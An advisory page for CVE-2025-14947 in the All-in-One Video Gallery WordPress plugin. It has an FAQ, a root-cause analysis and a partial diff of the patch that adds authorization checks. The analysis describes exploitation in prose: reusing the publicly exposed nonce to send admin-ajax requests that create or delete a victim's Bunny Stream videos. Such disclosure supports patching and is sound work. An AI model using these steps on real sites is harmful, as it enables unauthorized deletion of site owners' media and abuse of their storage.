What is CVE-2025-14947?

CVE-2025-14947 is a vulnerability in the All-in-One Video Gallery plugin for WordPress, affecting versions up to 4.6.4. It allows unauthenticated attackers to create and delete videos on the Bunny Stream CDN due to missing authorization checks in specific AJAX functions.

How does this vulnerability work?

The vulnerability arises from the registration of AJAX handlers without proper capability checks. Attackers can exploit this by obtaining a valid nonce, which is publicly exposed, and sending crafted requests to create or delete videos associated with a victim’s Bunny Stream account.

Who is affected by this vulnerability?

Any WordPress site using the All-in-One Video Gallery plugin version 4.6.4 or earlier is affected. Administrators should check their plugin version and update if necessary to ensure they are not vulnerable.

How can I check if I am affected?

To check if you are affected, log into your WordPress admin panel, navigate to the Plugins section, and look for the All-in-One Video Gallery plugin. If the version is 4.6.4 or earlier, your site is vulnerable.

What should I do to fix this vulnerability?

To mitigate this vulnerability, update the All-in-One Video Gallery plugin to version 4.7.1 or later, which includes security patches that address the missing authorization issue.

What does the CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could allow unauthorized access and manipulation of data.

What are the practical risks of this vulnerability?

If exploited, this vulnerability allows attackers to create unauthorized videos, consuming storage and bandwidth, and delete existing videos, which can disrupt services and lead to data loss for the affected user.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can exploit the vulnerability by using a valid nonce obtained from the public player templates. It illustrates how to send a crafted request to create a video on the Bunny Stream CDN, demonstrating the ease of exploitation.

What are nonce values and why are they important?

Nonce values in WordPress are used to verify that a request to perform an action comes from a legitimate source. In this vulnerability, the nonce is exposed, allowing attackers to bypass security checks and perform unauthorized actions.

Are there any other security measures I should consider?

In addition to updating the plugin, consider implementing web application firewalls, regular security audits, and monitoring for unusual activity on your WordPress site to enhance overall security.

What if I cannot update the plugin immediately?

If immediate updates are not possible, you can temporarily disable the All-in-One Video Gallery plugin to prevent exploitation until you can apply the necessary updates.

Where can I find more information about this vulnerability?

More information can be found on the official CVE database, security advisories from the plugin developers, and WordPress security forums that discuss vulnerabilities and their mitigations.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14947: All-in-One Video Gallery <= 4.6.4 – Missing Authorization to Unauthenticated Bunny Stream Video Creation/Deletion (all-in-one-video-gallery)

CVE ID CVE-2025-14947

Plugin all-in-one-video-gallery

Severity Medium (CVSS 6.5)

CWE 862

Vulnerable Version 4.6.4

Patched Version 4.7.1

Disclosed January 21, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14947:
The All-in-One Video Gallery WordPress plugin contains a missing authorization vulnerability in its Bunny Stream integration. Unauthenticated attackers can create and delete videos on the Bunny Stream CDN associated with the victim’s account. This vulnerability affects versions up to and including 4.6.4, with a CVSS score of 6.5.

The root cause is the plugin’s registration of AJAX handlers with both authenticated and unauthenticated hooks. In the vulnerable version, the file all-in-one-video-gallery/includes/init.php lines 370-376 registers three Bunny Stream functions with both wp_ajax_ and wp_ajax_nopriv_ hooks. The functions ajax_callback_create_bunny_stream_video, ajax_callback_get_bunny_stream_video, and ajax_callback_delete_bunny_stream_video in all-in-one-video-gallery/public/bunny-stream.php lack proper capability checks. These functions only verify a nonce through check_ajax_referer but do not validate user authentication or authorization.

Exploitation requires an attacker to obtain a valid nonce exposed in public player templates. The nonce is generated in all-in-one-video-gallery/includes/player/vidstack.php line 93 using wp_create_nonce(‘aiovg_ajax_nonce’). Attackers can then send POST requests to /wp-admin/admin-ajax.php with action parameters aiovg_create_bunny_stream_video, aiovg_get_bunny_stream_video, or aiovg_delete_bunny_stream_video. The payload includes the security nonce and Bunny Stream parameters like library_id, collection_id, title, and video_id.

The patch removes the wp_ajax_nopriv_ registrations in init.php lines 371-376. The bunny-stream.php file adds authentication checks at lines 152-177, 259-284, and 358-383. Each function now verifies is_user_logged_in() and checks user capabilities using aiovg_current_user_can(‘edit_aiovg_video’, $post_id) or aiovg_current_user_can(‘edit_aiovg_videos’). The plugin also separates nonce namespaces, using aiovg_public_ajax_nonce for frontend actions and aiovg_ajax_nonce for admin actions.

Successful exploitation allows attackers to create unauthorized videos on the victim’s Bunny Stream account, consuming storage and bandwidth quotas. Attackers can delete existing videos, causing service disruption and data loss. The vulnerability requires obtaining a valid nonce, which is exposed in public player templates, making exploitation feasible for unauthenticated users.

Differential between vulnerable and patched code

Code Diff

--- a/all-in-one-video-gallery/admin/admin.php
+++ b/all-in-one-video-gallery/admin/admin.php
@@ -753,6 +753,13 @@
 	public function enqueue_scripts( $hook ) {
 		global $post_type;

+		$post_id = 0;
+
+		$screen = get_current_screen();
+		if ( $screen && 'aiovg_videos' === $screen->post_type && ! empty( $_GET['post'] ) ) {
+			$post_id = absint( $_GET['post'] );
+		}
+
 		if (
 			( isset( $_GET['page'] ) && in_array( $_GET['page'], array( 'all-in-one-video-gallery', 'aiovg_settings', 'aiovg_import_export' ) ) ) ||
 			( in_array( $hook, array( 'post-new.php', 'post.php' ) ) && 'aiovg_videos' === $post_type ) ||
@@ -816,8 +823,9 @@
 			AIOVG_PLUGIN_SLUG . '-admin',
 			'aiovg_admin',
 			array(
-				'ajax_nonce' => wp_create_nonce( 'aiovg_ajax_nonce' ),
 				'site_url'   => get_site_url(),
+				'post_id'    => $post_id,
+				'ajax_nonce' => wp_create_nonce( 'aiovg_ajax_nonce' ),
 				'i18n'       => array(
 					'copied'             => __( 'Copied!', 'all-in-one-video-gallery' ),
 					'no_issues_selected' => __( 'Please select at least one issue.', 'all-in-one-video-gallery' ),
@@ -1063,14 +1071,28 @@
 		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );

 		$user_id = get_current_user_id();
-		$key     = isset( $_POST['key'] ) ? sanitize_text_field( $_POST['key'] ) : '';
-		$value   = isset( $_POST['value'] ) ? sanitize_text_field( $_POST['value'] ) : '';
+		if ( ! $user_id ) {
+			wp_die();
+		}
+
+		if ( ! current_user_can( 'manage_aiovg_options' ) ) {
+			wp_die();
+		}
+
+		$key = isset( $_POST['key'] ) ? sanitize_key( $_POST['key'] ) : '';
+		$allowed_keys = array( 'aiovg_video_form_tour',	'aiovg_automation_form_tour' );
+
+		if ( ! in_array( $key, $allowed_keys ) ) {
+			wp_die();
+		}

-		if ( ! empty( $user_id ) && ! empty( $key ) ) {
-			update_user_meta( $user_id, $key, $value );
+		$value = isset( $_POST['value'] ) ? trim( $_POST['value'] ) : 0;
+		if ( 'completed' !== $value ) {
+			$value = (int) $value;
 		}

-		wp_die();
+		update_user_meta( $user_id, $key, $value );
+		wp_die();
 	}

 }
--- a/all-in-one-video-gallery/admin/import-export.php
+++ b/all-in-one-video-gallery/admin/import-export.php
@@ -86,6 +86,7 @@

 		// Sanitize options
 		$include_subfolders = isset( $_POST['include_subfolders'] ) ? (int) $_POST['include_subfolders'] : 0;
+		$slug_strategy      = isset( $_POST['slug_strategy'] ) ? sanitize_key( $_POST['slug_strategy'] ) : 'filename';
 		$set_featured_image = isset( $_POST['set_featured_image'] ) ? (int) $_POST['set_featured_image'] : 0;
 		$enable_downloads   = isset( $_POST['enable_downloads'] ) ? (int) $_POST['enable_downloads'] : 0;
 		$enable_comments    = isset( $_POST['enable_comments'] ) ? (int) $_POST['enable_comments'] : 0;
@@ -195,6 +196,7 @@

 		// Import videos
 		$imported_data = $this->import_videos_from_folder( $videos, array(
+			'slug_strategy'      => $slug_strategy,
 			'categories'         => $categories,
 			'tags'               => $tags,
 			'comment_status'     => ( ! empty( $enable_comments ) ? 'open' : 'closed' ),
@@ -1408,6 +1410,10 @@
 				'comment_status' => $attributes['comment_status']
 			);

+			if ( 'random' === $attributes['slug_strategy'] ) {
+				$args['post_name'] = $this->generate_random_video_slug( $video_src );
+			}
+
 			$post_id = wp_insert_post( $args );

 			// Insert post meta
@@ -2074,6 +2080,25 @@
 	}

 	/**
+	 * Generate a secure, deterministic video post slug.
+	 *
+	 * @since  4.7.0
+	 * @access private
+	 * @param  string  $video_src Absolute or relative video file path.
+	 * @return string
+	 */
+	private function generate_random_video_slug( $video_src ) {
+		// Normalize path for consistency across environments
+		$normalized = wp_normalize_path( $video_src );
+
+		// Add site-specific salt
+		$hash = hash( 'sha256', $normalized . '|' . wp_salt( 'aiovg_video_slug' ) );
+
+		// Short, URL-safe slug
+		return substr( $hash, 0, 18 );
+	}
+
+	/**
 	 * Resolve video type.
 	 *
 	 * @since  4.5.2
--- a/all-in-one-video-gallery/admin/partials/import-export.php
+++ b/all-in-one-video-gallery/admin/partials/import-export.php
@@ -107,6 +107,37 @@
                                 </p>
                             </div>

+                            <!-- Field: Video Page Slug -->
+                            <div class="aiovg-form-control">
+                                <label for="aiovg-slug_strategy" class="aiovg-form-label">
+                                    <?php esc_html_e( 'Video Page Slug', 'all-in-one-video-gallery' ); ?>
+                                </label>
+
+                                <select name="slug_strategy" id="aiovg-slug_strategy" class="widefat">
+                                    <?php
+                                    $options = array(
+                                        'filename' => __( 'Use File Name', 'all-in-one-video-gallery' ),
+                                        'random'   => __( 'Generate Secure Random Slug (Recommended)', 'all-in-one-video-gallery' )
+                                    );
+
+                                    $slug_strategy = ! empty( $restrictions_settings['enable_restrictions'] ) ? 'random' : 'filename';
+
+                                    foreach ( $options as $key => $label ) {
+                                        printf(
+                                            '<option value="%s"%s>%s</option>',
+                                            esc_attr( $key ),
+                                            selected( $slug_strategy, $key, false ),
+                                            esc_html( $label )
+                                        );
+                                    }
+                                    ?>
+                                </select>
+
+                                <p class="description">
+                                    <?php esc_html_e( 'Choose how the video page URL slug should be generated. Using a random slug helps prevent users from guessing direct video file URLs.', 'all-in-one-video-gallery' ); ?>
+                                </p>
+                            </div>
+
                             <!-- Field: Video Categories -->
                             <div class="aiovg-form-control">
                                 <label for="aiovg-categories" class="aiovg-form-label">
--- a/all-in-one-video-gallery/admin/partials/video-image.php
+++ b/all-in-one-video-gallery/admin/partials/video-image.php
@@ -14,6 +14,19 @@
 $image              = isset( $post_meta['image'] ) ? $post_meta['image'][0] : '';
 $image_alt          = isset( $post_meta['image_alt'] ) ? $post_meta['image_alt'][0] : '';
 $set_featured_image = isset( $post_meta['set_featured_image'] ) ? $post_meta['set_featured_image'][0] : 1;
+
+if ( ! empty( $image ) ) {
+	$is_image_uploaded = isset( $post_meta['is_image_uploaded'] ) ? (int) $post_meta['is_image_uploaded'][0] : 0;
+
+	if ( ! empty( $is_image_uploaded ) ) {
+		$private_base_url = aiovg_get_private_base_url();
+
+		// Mask the URL only if it is not already masked
+		if ( 0 !== strpos( $image, $private_base_url ) ) {
+			$image = $private_base_url .  aiovg_base64_encode( $image );
+		}
+	}
+}
 ?>

 <div class="aiovg-form-controls">
--- a/all-in-one-video-gallery/admin/partials/video-sources.php
+++ b/all-in-one-video-gallery/admin/partials/video-sources.php
@@ -33,6 +33,19 @@
 $embedcode     = isset( $post_meta['embedcode'] ) ? $post_meta['embedcode'][0] : '';
 $download      = isset( $post_meta['download'] ) ? $post_meta['download'][0] : 1;

+if ( ! empty( $mp4 ) ) {
+	$is_video_uploaded = isset( $post_meta['is_video_uploaded'] ) ? (int) $post_meta['is_video_uploaded'][0] : 0;
+
+	if ( ! empty( $is_video_uploaded ) ) {
+		$private_base_url = aiovg_get_private_base_url();
+
+		// Mask the URL only if it is not already masked
+		if ( 0 !== strpos( $mp4, $private_base_url ) ) {
+			$mp4 = $private_base_url .  aiovg_base64_encode( $mp4 );
+		}
+	}
+}
+
 $can_upload_to_bunny_stream = false;
 if ( aiovg_current_user_can( 'edit_aiovg_video', $post->ID ) ) {
 	$can_upload_to_bunny_stream = aiovg_has_bunny_stream_enabled();
--- a/all-in-one-video-gallery/admin/settings.php
+++ b/all-in-one-video-gallery/admin/settings.php
@@ -988,6 +988,17 @@
                 ),
 			),
             'aiovg_general_settings' => array(
+                array(
+                    'name'              => 'force_load_assets',
+                    'label'             => __( 'Force Load Plugin Assets', 'all-in-one-video-gallery' ),
+                    'description'       => __( 'Force-load the plugin's CSS and/or JavaScript files on all front-end pages. Enable this option only if layouts do not render correctly due to page builders or theme conflicts.', 'all-in-one-video-gallery' ),
+                    'type'              => 'multicheck',
+                    'options'           => array(
+                        'css' => __( 'Force load CSS (recommended)', 'all-in-one-video-gallery' ),
+                        'js'  => __( 'Force load JavaScript (advanced)', 'all-in-one-video-gallery' ),
+                    ),
+                    'sanitize_callback' => 'aiovg_sanitize_array'
+                ),
                 array(
                     'name'              => 'lazyloading',
                     'label'             => __( 'Lazyload Images / Videos', 'all-in-one-video-gallery' ),
--- a/all-in-one-video-gallery/admin/videos.php
+++ b/all-in-one-video-gallery/admin/videos.php
@@ -258,13 +258,37 @@
 				// OK to save meta data
 				$featured_images_settings = aiovg_get_option( 'aiovg_featured_images_settings' );

+				$private_base_url = aiovg_get_private_base_url();
+
 				$type = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : 'default';
 				update_post_meta( $post_id, 'type', $type );

-				$mp4 = isset( $_POST['mp4'] ) ? aiovg_sanitize_url( $_POST['mp4'] ) : '';
+				delete_post_meta( $post_id, 'is_video_uploaded' );
+
+				$mp4 = isset( $_POST['mp4'] ) ? trim( $_POST['mp4'] ) : '';
+
+				if ( ! empty( $mp4 ) ) {
+					// Check if the URL is a masked uploaded file
+					if ( 0 === strpos( $mp4, $private_base_url ) ) {
+						// Extract the encoded portion
+						$encoded = substr( $mp4, strlen( $private_base_url ) );
+
+						// Decode the masked URL
+						$decoded = aiovg_base64_decode( $encoded );
+
+						// Sanitize the real file URL
+						$mp4 = aiovg_sanitize_url( $decoded );
+
+						update_post_meta( $post_id, 'is_video_uploaded', 1 );
+					} else {
+						// Direct URL entered by the user
+						$mp4 = aiovg_sanitize_url( $mp4 );
+					}
+				}
+
 				update_post_meta( $post_id, 'mp4', $mp4 );
 				update_post_meta( $post_id, 'mp4_id', attachment_url_to_postid( $mp4 ) );
-
+
 				$has_webm = isset( $_POST['has_webm'] ) ? 1 : 0;
 				update_post_meta( $post_id, 'has_webm', $has_webm );

@@ -322,8 +346,22 @@
 				$facebook = isset( $_POST['facebook'] ) ? aiovg_sanitize_url( $_POST['facebook'] ) : '';
 				update_post_meta( $post_id, 'facebook', $facebook );

+				$embedcode = isset( $_POST['embedcode'] ) ? trim( wp_unslash( $_POST['embedcode'] ) ) : '';
+
+				if ( $embedcode && filter_var( $embedcode, FILTER_VALIDATE_URL ) ) {
+					$parsed = wp_parse_url( $embedcode );
+
+					// Allow only http / https URLs
+					if ( isset( $parsed['scheme'] ) && in_array( $parsed['scheme'], array( 'http', 'https' ) ) ) {
+						$embedcode = sprintf(
+							'<iframe src="%s" width="560" height="315" frameborder="0" scrolling="no" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>',
+							esc_url( $embedcode )
+						);
+					}
+				}
+
 				add_filter( 'wp_kses_allowed_html', 'aiovg_allow_iframe_script_tags' );
-				$embedcode = isset( $_POST['embedcode'] ) ? wp_kses_post( str_replace( "'", '"', $_POST['embedcode'] ) ) : '';
+				$embedcode = ! empty( $embedcode ) ? wp_kses_post( str_replace( "'", '"', $embedcode ) ) : '';
 				update_post_meta( $post_id, 'embedcode', $embedcode );
 				remove_filter( 'wp_kses_allowed_html', 'aiovg_allow_iframe_script_tags' );

@@ -360,11 +398,29 @@
 				update_post_meta( $post_id, 'download', $download );

 				// Poster Image
-				$image    = '';
+				delete_post_meta( $post_id, 'is_image_uploaded' );
+
+				$image    = isset( $_POST['image'] ) ? trim( $_POST['image'] ) : '';
 				$image_id = 0;

-				if ( ! empty( $_POST['image'] ) ) {
-					$image    = aiovg_sanitize_url( $_POST['image'] );
+				if ( ! empty( $image ) ) {
+					// Check if the URL is a masked uploaded file
+					if ( 0 === strpos( $image, $private_base_url ) ) {
+						// Extract the encoded portion
+						$encoded = substr( $image, strlen( $private_base_url ) );
+
+						// Decode the masked URL
+						$decoded = aiovg_base64_decode( $encoded );
+
+						// Sanitize the real file URL
+						$image = aiovg_sanitize_url( $decoded );
+
+						update_post_meta( $post_id, 'is_image_uploaded', 1 );
+					} else {
+						// Direct URL entered by the user
+						$image = aiovg_sanitize_url( $image );
+					}
+
 					$image_id = attachment_url_to_postid( $image );
 				} else {
 					if ( 'youtube' == $type && ! empty( $youtube ) ) {
--- a/all-in-one-video-gallery/all-in-one-video-gallery.php
+++ b/all-in-one-video-gallery/all-in-one-video-gallery.php
@@ -11,7 +11,7 @@
  * Plugin Name:     All-in-One Video Gallery
  * Plugin URI:      https://plugins360.com/all-in-one-video-gallery/
  * Description:     An ultimate video player and video gallery plugin – no coding required. Suitable for YouTubers, Video Bloggers, Course Creators, Podcasters, Sales & Marketing Professionals, and anyone using video on a website.
- * Version:         4.6.4
+ * Version:         4.7.1
  * Author:          Team Plugins360
  * Author URI:      https://plugins360.com
  * License:         GPL-2.0+
@@ -68,7 +68,7 @@
 }
 // The current version of the plugin
 if ( !defined( 'AIOVG_PLUGIN_VERSION' ) ) {
-    define( 'AIOVG_PLUGIN_VERSION', '4.6.4' );
+    define( 'AIOVG_PLUGIN_VERSION', '4.7.1' );
 }
 // The unique identifier of the plugin
 if ( !defined( 'AIOVG_PLUGIN_SLUG' ) ) {
--- a/all-in-one-video-gallery/includes/helpers/functions.php
+++ b/all-in-one-video-gallery/includes/helpers/functions.php
@@ -751,6 +751,12 @@
  * @return array $defaults Array of plugin settings.
  */
 function aiovg_get_default_settings() {
+	static $defaults = null;
+
+	if ( null !== $defaults ) {
+		return $defaults;
+	}
+
 	$video_page_slug = 'aiovg_videos';
 	$slugs = array( 'video', 'watch' );

@@ -815,7 +821,6 @@
 			'order'           => 'desc',
 			'thumbnail_style' => 'standard',
 			'display'         => array(
-				'count'    => 'count',
 				'title'    => 'title',
 				'category' => 'category',
 				'tag'      => 'tag',
@@ -895,9 +900,14 @@
 			'show_consent'         => 0,
 			'consent_message'      => __( '<strong>Please accept cookies to play this video</strong>. By accepting you will be accessing content from a service provided by an external third party.', 'all-in-one-video-gallery' ),
 			'consent_button_label' => __( 'I Agree', 'all-in-one-video-gallery' ),
-			'disable_cookies'      => array()
+			'disable_cookies'      => array(
+				'aiovg_rand_seed' => 'aiovg_rand_seed'
+			)
 		),
 		'aiovg_general_settings' => array(
+			'force_load_assets'         => array(
+				'css' => 'css'
+			),
 			'lazyloading'               => 0,
 			'datetime_format'           => '',
 			'number_format'             => 'full',
@@ -1264,6 +1274,16 @@
 }

 /**
+ * Returns the base URL used for private masked media.
+ *
+ * @since  4.7.0
+ * @return string
+ */
+function aiovg_get_private_base_url() {
+	return untrailingslashit( get_site_url() ) . '/private/';
+}
+
+/**
  * Get the sorting options for the search form.
  *
  * @since  3.8.4
@@ -2132,13 +2152,8 @@
  * @return string Unique ID.
  */
 function aiovg_get_uniqid() {
-	global $aiovg;
-
-	if ( ! isset( $aiovg['uniqid'] ) ) {
-		$aiovg['uniqid'] = 0;
-	}
-
-	return uniqid() . ++$aiovg['uniqid'];
+	static $counter = 0;
+	return uniqid() . ++$counter;
 }

 /**
@@ -2518,6 +2533,11 @@
  * @param int   $post_id Post ID
  */
 function aiovg_update_views_count( $post_id ) {
+	$can_update_views_count = apply_filters( 'aiovg_can_update_views_count', true, $post_id );
+	if ( ! $can_update_views_count ) {
+		return;
+	}
+
 	$privacy_settings = aiovg_get_option( 'aiovg_privacy_settings' );

 	if ( isset( $privacy_settings['disable_cookies'] ) && isset( $privacy_settings['disable_cookies']['aiovg_videos_views'] ) ) {
--- a/all-in-one-video-gallery/includes/helpers/render.php
+++ b/all-in-one-video-gallery/includes/helpers/render.php
@@ -281,7 +281,7 @@
 	wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 	if ( 'search' != $attributes['filters_mode'] ) {
-		wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+		wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-search' );
 	}

 	if ( ! empty( $attributes['has_category'] ) || ! empty( $attributes['has_tag'] ) ) {
--- a/all-in-one-video-gallery/includes/init.php
+++ b/all-in-one-video-gallery/includes/init.php
@@ -260,6 +260,7 @@
 		$this->loader->add_action( 'init', $public, 'init' );
 		$this->loader->add_action( 'init', $public, 'register_styles' );
 		$this->loader->add_action( 'init', $public, 'register_scripts' );
+		$this->loader->add_action( 'wp_enqueue_scripts', $public, 'enqueue_assets', 99 );
 		$this->loader->add_action( 'aiovg_enqueue_block_editor_assets', $public, 'enqueue_block_editor_assets' );
 		$this->loader->add_action( 'elementor/editor/after_enqueue_scripts', $public, 'enqueue_block_editor_assets' );
 		$this->loader->add_action( 'elementor/preview/enqueue_scripts', $public, 'enqueue_block_editor_assets' );
@@ -370,11 +371,8 @@

 		$this->loader->add_action( 'aiovg_save_video', $bunny_stream, 'save_bunny_stream_data' );
 		$this->loader->add_action( 'wp_ajax_aiovg_create_bunny_stream_video', $bunny_stream, 'ajax_callback_create_bunny_stream_video' );
-		$this->loader->add_action( 'wp_ajax_nopriv_aiovg_create_bunny_stream_video', $bunny_stream, 'ajax_callback_create_bunny_stream_video' );
 		$this->loader->add_action( 'wp_ajax_aiovg_get_bunny_stream_video', $bunny_stream, 'ajax_callback_get_bunny_stream_video' );
-		$this->loader->add_action( 'wp_ajax_nopriv_aiovg_get_bunny_stream_video', $bunny_stream, 'ajax_callback_get_bunny_stream_video' );
 		$this->loader->add_action( 'wp_ajax_aiovg_delete_bunny_stream_video', $bunny_stream, 'ajax_callback_delete_bunny_stream_video' );
-		$this->loader->add_action( 'wp_ajax_nopriv_aiovg_delete_bunny_stream_video', $bunny_stream, 'ajax_callback_delete_bunny_stream_video' );
 		$this->loader->add_action( 'before_delete_post', $bunny_stream, 'before_delete_post', 1 );

 		$this->loader->add_filter( 'aiovg_get_image', $bunny_stream, 'filter_image_url', 10, 4 );
--- a/all-in-one-video-gallery/includes/player/popup.php
+++ b/all-in-one-video-gallery/includes/player/popup.php
@@ -55,11 +55,16 @@
 				$is_image = 1;
 			}
 		} else {
-			$popup_content = trim( $this->args['content'] );
+			$popup_content = trim( (string) $this->args['content'] );

-			if ( ! filter_var( $popup_content, FILTER_VALIDATE_URL ) === FALSE ) {
-				$popup_content = sprintf( '<img src="%s" alt="" %s/>', esc_url( $popup_content ), $lazyloading );
-				$is_image = 1;
+			if ( $popup_content && filter_var( $popup_content, FILTER_VALIDATE_URL ) ) {
+				$parsed = wp_parse_url( $popup_content );
+
+				// Allow only http / https URLs
+				if ( isset( $parsed['scheme'] ) && in_array( $parsed['scheme'], array( 'http', 'https' ) ) ) {
+					$popup_content = sprintf( '<img src="%s" alt="" %s/>', esc_url( $popup_content ), $lazyloading );
+					$is_image = 1;
+				}
 			}
 		}

--- a/all-in-one-video-gallery/includes/player/vidstack.php
+++ b/all-in-one-video-gallery/includes/player/vidstack.php
@@ -93,7 +93,7 @@
 			'post_id'     => $this->post_id,
 			'post_type'   => sanitize_text_field( $this->post_type ),
 			'ajax_url'    => sanitize_url( admin_url( 'admin-ajax.php' ) ),
-			'ajax_nonce'  => sanitize_text_field( wp_create_nonce( 'aiovg_ajax_nonce' ) ),
+			'ajax_nonce'  => wp_create_nonce( 'aiovg_public_ajax_nonce' ),
 			'lazyloading' => (int) $player_settings['lazyloading'],
 			'player'  => array(
 				'iconUrl' => AIOVG_PLUGIN_URL . 'vendor/vidstack/plyr.svg',
--- a/all-in-one-video-gallery/public/bunny-stream.php
+++ b/all-in-one-video-gallery/public/bunny-stream.php
@@ -66,7 +66,27 @@
 	 */
 	public function save_bunny_stream_data( $post_id ) {
 		$type = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : 'default';
-		$mp4  = isset( $_POST['mp4'] ) ? aiovg_sanitize_url( $_POST['mp4'] ) : '';
+		$mp4  = isset( $_POST['mp4'] ) ? trim( $_POST['mp4'] ) : '';
+
+		if ( ! empty( $mp4 ) ) {
+			$private_base_url = aiovg_get_private_base_url();
+
+			// Check if the URL is a masked uploaded file
+			if ( 0 === strpos( $mp4, $private_base_url ) ) {
+				// Extract the encoded portion
+				$encoded = substr( $mp4, strlen( $private_base_url ) );
+
+				// Decode the masked URL
+				$decoded = aiovg_base64_decode( $encoded );
+
+				// Sanitize the real file URL
+				$mp4 = aiovg_sanitize_url( $decoded );
+			} else {
+				// Direct URL entered by the user
+				$mp4 = aiovg_sanitize_url( $mp4 );
+			}
+		}
+
 		$bunny_stream_video_id = isset( $_POST['bunny_stream_video_id'] ) ? sanitize_text_field( $_POST['bunny_stream_video_id'] ) : 0;

 		if ( ! empty( $bunny_stream_video_id ) ) {
@@ -129,8 +149,34 @@
 	 * @since 4.2.0
 	 */
 	public function ajax_callback_create_bunny_stream_video() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' ); // Verify the nonce for security
+		// Verify nonce
+		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+
+		// Ensure user is logged in
+		if ( ! is_user_logged_in() ) {
+			wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+		}
+
+		// Verify user capability
+		$post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
+
+		if ( $post_id > 0 ) {
+			$post = get_post( $post_id );

+			if ( ! $post || 'aiovg_videos' !== $post->post_type ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+
+			if ( ! aiovg_current_user_can( 'edit_aiovg_video', $post_id ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		} else {
+			if ( ! aiovg_current_user_can( 'edit_aiovg_videos' ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		}
+
+		// Vars
 		$settings = aiovg_has_bunny_stream_enabled(); // Fetch Bunny Stream settings
 		$response = array();

@@ -210,8 +256,34 @@
 	 * @since 4.2.0
 	 */
 	public function ajax_callback_get_bunny_stream_video() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' ); // Verify the nonce for security
+		// Verify nonce
+		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+
+		// Ensure user is logged in
+		if ( ! is_user_logged_in() ) {
+			wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+		}
+
+		// Verify user capability
+		$post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
+
+		if ( $post_id > 0 ) {
+			$post = get_post( $post_id );

+			if ( ! $post || 'aiovg_videos' !== $post->post_type ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+
+			if ( ! aiovg_current_user_can( 'edit_aiovg_video', $post_id ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		} else {
+			if ( ! aiovg_current_user_can( 'edit_aiovg_videos' ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		}
+
+		// Vars
 		$settings = aiovg_has_bunny_stream_enabled(); // Fetch Bunny Stream API settings
 		$response = array();

@@ -283,8 +355,35 @@
 	 * @since 4.2.2
 	 */
 	public function ajax_callback_delete_bunny_stream_video() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' ); // Verify the nonce for security
+		// Verify nonce
+		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+
+		// Ensure user is logged in
+		if ( ! is_user_logged_in() ) {
+			wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+		}
+
+		// Verify user capability
+		$post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
+
+		if ( $post_id > 0 ) {
+			$post = get_post( $post_id );
+
+			if ( ! $post || 'aiovg_videos' !== $post->post_type ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+
+			if ( ! aiovg_current_user_can( 'delete_aiovg_video', $post_id ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		} else {
+			// If no post exists yet, this is a cancel-upload cleanup
+			if ( ! aiovg_current_user_can( 'edit_aiovg_videos' ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		}

+		// Vars
 		$response = array();
 		$video_id = isset( $_POST['video_id'] ) ? sanitize_text_field( $_POST['video_id'] ) : '';

--- a/all-in-one-video-gallery/public/categories.php
+++ b/all-in-one-video-gallery/public/categories.php
@@ -47,7 +47,7 @@
 	 */
 	public function ajax_callback_load_categories() {
 		// Security check
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );

 		// Proceed safe
 		$json = array();
@@ -74,7 +74,7 @@
 		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 		if ( 'dropdown' == $template ) {
-			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-categories' );
 		}

 		// Process output
--- a/all-in-one-video-gallery/public/likes.php
+++ b/all-in-one-video-gallery/public/likes.php
@@ -76,7 +76,7 @@
 	 * @since 3.6.1
 	 */
 	public function ajax_callback_get_likes_dislikes_info() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );

 		// Proceed safe
 		$response = array(
@@ -136,7 +136,7 @@
 	 * @since 3.6.1
 	 */
 	public function ajax_callback_toggle_likes() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
